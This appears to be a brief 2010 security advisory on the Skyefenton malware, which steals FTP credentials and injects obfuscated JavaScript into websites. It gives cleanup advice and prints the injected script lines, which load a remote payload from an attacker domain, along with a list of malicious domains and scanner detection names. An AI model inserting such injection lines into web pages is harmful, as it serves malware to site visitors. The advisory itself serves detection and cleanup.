Skyefenton Malware
Updated: October 26, 2010
The Skyefenton malware places obfuscated malicious JavaScript into a website's web pages and JavaScript files. To clean the website, the website needs to be reverted to a clean backup or the malicious code needs to be removed from the web pages. The malware gains access to the website through FTP credentials that have been compromised by malware located on a computer that has accessed the website via FTP. To prevent the website from being reinfected the FTP password needs to be changed and the malware removed from the infected computer before it used again to access the website via FTP.
Recent Script Format On Web Pages:
<script type="text/javascript" src="http://inc.propertyfiend.com:8080/JPEG.js"></script>
<!--3a723164f16a6802caf1d9808629e3b1-->
Recent Script Format On JavaScript Files:
document.write('<s'+'cript type="text/javascript" src="http://inc.propertyfiend.com:8080/JPEG.js"></scr'+'ipt>');
Recent Domains Used by the Malware: kollinsoy.skyefenton.com, inc.propertyfiend.com, iopap.upperdarby26.com, dodo.busop.info, dolgo.lulucabana.com, solk.seamscreative.info, sfofotky.iexam.info, soaoo.blog-salopes.com, oployau.fancountblogger.com, sokyoss.drelshazly.com, dolfy.sedonahyperbarics.com, addle.diretctrishta.com, utmost.dawnandjimmy.us
Recent Virus Scan Identifications: HTML:Script-inf, Mal/Badsrc-C, JS:Illredir-CI [Trj]